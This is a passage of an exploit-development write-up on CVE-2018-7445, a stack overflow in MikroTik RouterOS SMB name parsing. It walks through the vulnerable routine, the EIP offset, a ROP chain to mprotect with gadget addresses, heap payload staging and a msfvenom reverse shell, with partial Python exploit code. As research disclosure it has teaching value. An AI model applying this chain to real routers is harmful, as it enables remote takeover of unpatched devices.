We continue going through each instruction in GDB using n instead of s to avoid stepping into the functions. After each function runs, we take a look at the stack. The first function we encounter is 0x805015e. After it runs we see that the stack seems to be OK, so this is probably not the function responsible for the overflow. A few instructions later we have the next candidate, the function at 0x8054607. Once again, we let it run and observe the stack and register context afterwards. Aaaaand we found our culprit. Take a look at EBP and observe that the stack frame has been corrupted. Continue debugging until the function is about to return. Here various registers are popped from the stack that contains our data. Unpopular thought here: you do not really need to understand what this function is doing at all to exploit the vulnerability. We already have EIP control and most of the stack looks more or less like uncorrupted input data. Taking some time to review the function at 0x8054607 with GDB's help results in the following pseudo-code:

int parse_names(char *dst, char *src)
{
    int len;
    int i;
    int offset;

    // take the length of the first string
    len = *src;
    offset = 0;
    while (len) {
        // copy the bytes of the string into the destination buffer
        for (i = offset; (i - offset) < len; ++i) {
            dst[i] = src[i+1];
        }
        // take the length of the next string
        len = src[i+1];
        // if it exists, then add a separator
        if (len) {
            dst[i] = '.';
        }
        // start over with the next string
        offset = i + 1;
    }
    // nul-terminate the string
    dst[offset] = 0;
    return offset;
}

In essence, the function receives two stack-allocated buffers, where the source buffer is expected to be in the format SIZE1, BUF1, SIZE2, BUF2, SIZE3, BUF3, etc., and "." is used as the entry separator. The first byte of the source buffer is read and used as the size for the copy operation. The function then copies that amount of bytes into the destination buffer.
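The parsing loop can be modeled in Python to make the behavior concrete. This is an illustrative model only: unlike the real C routine, it grows its output buffer instead of writing past a fixed-size stack allocation, but it shows how the attacker-controlled length bytes drive the copy.

```python
def parse_names(src):
    """Python model of the vulnerable routine at 0x8054607 (illustrative only).

    src is a NetBIOS "names" buffer: a length byte, that many name bytes,
    another length byte, and so on, terminated by a zero length byte. In the
    real binary the output goes into a fixed-size stack buffer with no bounds
    check, so large length bytes overflow it."""
    dst = bytearray()
    offset = 0
    length = src[0]
    while length:
        i = offset
        # copy `length` bytes -- in the C version this is the unbounded write
        while i - offset < length:
            dst.extend(src[i + 1:i + 2])
            i += 1
        length = src[i + 1] if i + 1 < len(src) else 0
        if length:
            dst.extend(b".")  # separator between name entries
        offset = i + 1
    return bytes(dst)

# Two 4-byte names become "AAAA.BBBB"; a single 0xff length byte would make
# the C routine copy 255 attacker bytes into the fixed-size stack buffer.
names = b"\x04AAAA\x04BBBB\x00"
```

This also explains the stray "." (0x2e) bytes seen in the crash dumps: they are the separators the routine inserts between consecutive name entries.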
Once that is done, the next byte of the source buffer is read and used as the new size. This loop finishes when the size to copy is equal to zero. No validation is done to ensure that the data fits in the destination buffer, resulting in a stack overflow.

Writing an exploit

How to approach the exploitation depends on the specifics of the targeted device and architecture. Here we are only interested in the Cloud Hosted Router x86 binary. It is worth mentioning that there might be several different ways to achieve reliable exploitation of this vulnerability, so we are going to review the one *we* used, which might not be the most elegant or efficient way to do it. Tobias Klein's checksec script is a great resource to check which mitigations we will need to fight against. This script can be invoked from PEDA. The lack of stack canaries is probably the most relevant missing mitigation, enabling stack-based buffer overflows to be easily exploited. If the program had been compiled with stack canaries, then our previous tests would have had a very different result. Stack canaries place random values before important data in each function frame that allocates buffers, and these values are checked before the function returns. In case an overflow occurs, execution is terminated and no further exploitation is possible. PIE disabled means we can rely on fixed locations for the program code, and disabled RELRO means we can overwrite entries in the Global Offset Table. To sum up, we will only be dealing with NX, which restricts execution from writable areas such as the stack or the heap. Another mitigation that is implemented at a system level is ASLR. This is a 32-bit system, so a partial overwrite or even brute forcing may be considered a feasible bypass of ASLR. In this case, that will not be necessary. Inspecting the memory mappings for any program in RouterOS shows that the stack base is indeed randomized but the heap is not.
This can be verified by running cat /proc/self/maps a few times and comparing the results. The first step in building our exploit is getting the exact offset needed to control EIP. In order to do this we can generate a unique pattern with PEDA using the command pattern create 256 and plug it into our exploit skeleton. Note that the first byte after the header will be the size parsed by the vulnerable function, so we specify 0xFF to read 256 bytes unaltered and avoid the "." character being placed in the middle of our payload. When the crash takes place, it is possible to use the accompanying pattern offset VALUE command to determine the exact location that overwrites EIP. Alter the payload and verify that EIP can be set to an arbitrary value. We do not observe annoying "." characters, which is good. Now that we control EIP and the rest of the stack, we can use the borrowed code chunks technique, better known as return oriented programming or ROP (some people seem to be very annoyed with those using the latter term, so it is probably better to mention all the alternatives). The main idea is that we will chain various code snippets that end in a RET instruction to execute more or less arbitrary code. Given enough of these gadgets we should be able to run anything we want. In this particular case, though, we only want to mark the heap area as executable. The end goal is to store something in the heap (which already contains messages read from the client) and jump there, taking advantage of the static base address. The relevant function here is mprotect, which looks as follows:

int mprotect(void *addr, size_t len, int prot);

The address will be 0x8072000, which is the base of the heap. This needs to be page-aligned for it to work. len can be anything we want, but let's change the protection of the whole 0x14000 bytes. Finally, prot refers to a bitwise OR of the desired protections to enforce.
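PEDA's pattern commands can be approximated with a short Python sketch. To be clear, this is not PEDA's actual algorithm; a simple unique-triplet pattern (Metasploit-style) is enough to illustrate how the EIP offset is recovered:

```python
import string

def pattern_create(length):
    """Generate a cyclic pattern of unique Upper-lower-digit triplets."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.extend((upper + lower + digit).encode())
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])

def pattern_offset(value, length=4096):
    """Given the bytes found in EIP at crash time, return their offset in the pattern."""
    return pattern_create(length).find(value)

pat = pattern_create(256)
# After the crash, feed the 4 bytes that landed in EIP (in memory order)
# to pattern_offset to learn how much padding precedes the return address.
```

Because every triplet is unique within the pattern, the dword that lands in EIP maps back to exactly one position in the payload.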
7 refers to PROT_READ | PROT_WRITE | PROT_EXEC, which is essentially the RWX we are aiming for. There are various tools that can attempt to create the chain automatically, such as ROPgadget and Ropper. We will use Ropper but build the ROP chain manually to show how it can be done. As per the Linux system call convention, EAX will contain the syscall number, which is 0x7d for mprotect. EBX will contain the address parameter, ECX the size, and EDX the desired protection. Let's start by setting EBX to 0x8072000. We look for a gadget that contains the POP EBX instruction and has the fewest side effects possible. We choose the smaller gadget and start constructing our chain. This looks as follows: execution will be redirected to 0x804c39d, which will first execute a POP EBX instruction, setting EBX to the desired value of 0x8072000. Next, POP EBP will be executed, so we need to provide some dummy value so there is something to pop from the stack. Finally, the RET instruction is executed, which pops whatever is next on the stack and jumps there. This needs to be our next step in the chain. All values are packed as little-endian unsigned integers. We follow the same process to set the desired size in ECX. It is important to understand that the order matters, as we could unknowingly overwrite registers we have already set if we are not careful. Moreover, sometimes the gadgets will not look as nice as POP DESIRED_REG; RET and we will have to deal with potential side effects that need additional adjustments. Here we will choose the more benign 0x080664f5. This gadget alters the value of EAX, but we do not rely on anything specific set in EAX at this time, so it is useful. We append this to our ROP chain. We repeat the process, this time to set EDX to 7, which is the RWX protection level. This time we select the gadget at 0x08066f24, which does not mess with our previously set registers. Finally, we need to set EAX to the syscall number 0x7d.
We search for gadgets containing POP EAX and find nothing that would leave our current setup intact. We could try reordering our gadgets, but instead we search for another gadget that does XCHG EAX, EBP and chain it with the ubiquitous POP EBP; RET. From here we take 0x804f94a and 0x804c39e and append them.

The registers are now configured as desired to execute the mprotect system call. To do so, we need to issue INT 0x80, which notifies the kernel that we want to execute the system call. However, when we look for gadgets containing this instruction, we find none. This could make things a bit more difficult.

Luckily, there is another place where this kind of gadget can be found. All user space applications have a small shared library mapped into their address space by the kernel called the vDSO (virtual dynamic shared object). It exists for performance reasons: it is a way for the kernel to export frequently called functions to user space and avoid the context switch for functions that are called very often. If we take a look at the man page, we will see something interesting:

This means there is a function in the vDSO that knows how to perform system calls. We can inspect what this function does in GDB. As can be observed in the screenshot above, __kernel_vsyscall contains a useful gadget. We run the process a few times and confirm that this mapping is not affected by ASLR, which allows us to use the gadget. The values of EBX, ECX and EBP do not really matter at this point, as they will be set after the system call is executed anyway.

We update the exploit code to send the chain we built and attach GDB to the running SMB binary. EIP will redirect execution to our first gadget, so it is a good idea to put a breakpoint at 0x804c39d, the start of the chain. Use stepi to observe how the registers are set to the desired values.
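Completing the chain might look like the sketch below. The gadget addresses 0x804c39e and 0x804f94a are from the text; the ordering shown assumes 0x804c39e is POP EBP; RET and 0x804f94a is XCHG EAX, EBP; RET, and must be adjusted to the real gadget bodies. The __kernel_vsyscall INT 0x80 address is environment-specific (read from GDB on the target, where the vDSO mapping was not randomized), so the value here is a hypothetical placeholder:

```python
import struct

def p32(v):
    """Pack a value as a little-endian unsigned 32-bit integer."""
    return struct.pack("<I", v)

# Hypothetical placeholder: address of the INT 0x80 inside
# __kernel_vsyscall, taken from GDB on the target.
VDSO_INT80 = 0xB7FFF414

rop = b""
# 0x804c39e: POP EBP; RET  ->  EBP = mprotect syscall number
rop += p32(0x0804C39E)
rop += p32(0x0000007D)   # __NR_mprotect
# 0x804f94a: XCHG EAX, EBP; RET  ->  EAX = 0x7d
rop += p32(0x0804F94A)
# vDSO gadget: INT 0x80 finally performs the mprotect system call
rop += p32(VDSO_INT80)
```

After the INT 0x80 returns, execution continues with whatever address comes next on the stack, which is where the final jump into the heap will go.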
Right after INT 0x80, we can list the mapped areas and, if everything worked, the heap will be marked as RWX.

The remaining piece is storing arbitrary code in the heap at a known location so we can jump there and get a shell. But how can we do this? When we put a breakpoint in read(), we observed that the request data was being stored somewhere in the heap. In addition, we had various samples of Negotiate Protocol Request messages, so it is possible to determine that if the message type byte is set to 0x00, we reach a code path where the payload is processed and stored in the heap.

To test this assumption, let’s put a breakpoint in read() again and change the PoC payload to send a benign Negotiate Protocol Request message with 512 “A”s as content. As a reminder, the format is:

message type (1 byte) — flags (1 byte) — message length (2 bytes) — message

This time the message type is set to NETBIOS_SESSION_MESSAGE (0x00). We avoid using another Session Request message (0x81) so we do not accidentally trigger the vulnerability and have to deal with the “.” characters the vulnerable function places in between.

Step through the read function until the 0x204 bytes (512 “A”s plus the 4-byte header) are read from the network. As stated before, ECX contains the address of the buffer, and inspecting the memory at that address shows our payload. Press c to let execution continue normally and send a new request to check whether the previous one gets overwritten or is simply left in the heap.

When the breakpoint is hit again, we try to print the contents of the read buffer and unfortunately find it has been zeroed out. However, the previous request could still be lingering somewhere else if the application made a copy that was not zeroed out. It is possible to search the current address space with PEDA using the find or searchmem commands.
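The message format described above can be sketched as a small Python helper. The field sizes are from the text; the big-endian length field is an assumption based on the standard NetBIOS session header:

```python
import struct

NETBIOS_SESSION_MESSAGE = 0x00  # benign type, payload stored in the heap
SESSION_REQUEST = 0x81          # type that reaches the vulnerable function

def build_message(msg_type, body, flags=0):
    """Build a packet: type (1 byte) | flags (1 byte) | length (2 bytes) | body.

    Big-endian length is assumed here; the article only gives field sizes.
    """
    return struct.pack(">BBH", msg_type, flags, len(body)) + body

# Benign Negotiate Protocol Request carrying 512 "A"s
req = build_message(NETBIOS_SESSION_MESSAGE, b"A" * 512)
assert len(req) == 0x204  # 512 payload bytes + 4-byte header
```

Sending req should make the 0x204-byte read observable at the breakpoint exactly as described above.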
Our message consists of 512 “A”s, so we attempt to find a contiguous block of “A”s. The commands take an optional parameter, separated by whitespace, to confine the search to a specific area; we are only interested in results that might be in the heap. The hit means the contents of the request are being copied and left in some buffer that is not cleared out.

We need a few more tests before we can trust this location to store our payload. In particular, if we change the script to send 512 “B”s instead of “A”s, we see that 0x8085074 ends up containing the “B”s after the request is processed. We need data to persist across additional requests, so this is not good. However, if we first send 512 “A”s and then, say, 256 “B”s, it becomes evident that the first half is overwritten but the second half still contains the bytes from the previous request. The weird-looking 0x00000e89 is chunk metadata from the heap control structures and is not relevant to our scenario.

Knowing that the data persists across at least two requests, we can craft the following plan:

1. Send a Negotiate Protocol Request with the code we want to execute. The first part will be a few hundred NOP instructions, because these bytes will be overwritten when we issue the second request with the corresponding Session Request message that triggers the vulnerability.
2. Send a Session Request message that corrupts the stack, ROPs to mprotect, marks the heap as executable and jumps to the hard-coded location where the payload from step 1 is stored, abusing the fact that the heap base is not randomized.

We make an arbitrary decision to leave 512 bytes for the second request, so we will jump to the hard-coded location 0x8085074 + 512 = 0x8085270. This address needs to be appended to our ROP chain: the previous gadget executes its final RET instruction, 0x8085270 is popped from the stack, and program execution follows.
The first version of the shellcode consists only of INT3 instructions (opcode CC) so the debugger breaks upon execution. The script is also modified to open two connections, one for each request. Attach to a new SMB process and run the exploit. We are now executing arbitrary code.

Let’s generate a reverse shell payload with msfvenom. We modify the first stage to store this payload and run the exploit again, this time with a netcat listener open on the specified port so we can receive the connection.

…and we have a shell. Hooray!

Conclusion

Fuzzing a network service using a mutation-based approach can be done with very little effort and may produce great results. If you are looking for vulnerabilities in applications that speak arcane proprietary protocols, or are just too lazy to build a comprehensive template, give dumb fuzzing a go. You can even leave the fuzzer running with minimum effort while you apply your ninja reverse engineering skills to understand the protocol and build something better.

RouterOS-powered devices are now everywhere, and the lack of modern (for arbitrary definitions of modern) exploit mitigations is a bit worrisome. Full ASLR would make the life of exploit writers more difficult, and if the binaries were compiled with stack canary support, most stack overflows would be rendered unexploitable in the absence of info-leak vulnerabilities.

It is worth mentioning that MikroTik’s response and patch times were great. At first, the changelog did not hint that a security vulnerability existed:

What's new in 6.41.3 (2018-Mar-08 11:55):
*) smb - improved NetBIOS name handling and stability;

However, they seem to be more serious now. They include more detailed comments in their changelogs regarding security vulnerabilities and have a blog where they post official announcements about these types of issues as well.
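The INT3 test stage described above can be sketched as follows; 0x90 is the NOP opcode and 0xCC is INT3, as noted in the text:

```python
# First-stage test payload: NOP sled (sacrificed to the second request)
# followed by INT3 breakpoints, so an attached debugger traps as soon as
# the jump into the heap lands anywhere past the sled.
NOP, INT3 = 0x90, 0xCC

stage1_code = bytes([NOP]) * 512 + bytes([INT3]) * 64
```

Once the debugger confirms the trap fires, the INT3 block is swapped for the msfvenom-generated reverse shell and a netcat listener receives the connection.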
The astute reader might have noticed that, if you reproduce the steps outlined in this post, you might even find a few additional 0days in RouterOS SMB. Have fun!

Additional resources

• Original advisory at Core Security: https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow
• Detailed analysis of chimay-red (the bug in WWW leaked in Vault 7): https://blog.seekintoo.com/chimay-red.html
• MIPS exploit of the bug described in this post, by BigNerd95: https://github.com/BigNerd95/Chimay-Blue
• Jacob Baines’ posts: https://medium.com/@jbaines
• Cool analysis of the famous Winbox vulnerability from last year: https://n0p.me/winbox-bug-dissection/
• 0ki’s MikroTik tools: https://github.com/0ki/mikrotik-tools
• 0ki’s research hub with dozens of presentations in video/slides format: https://kirils.org/

maxi

Source: https://medium.com/@maxi./finding-and-exploiting-cve-2018-7445-f3103f163cc1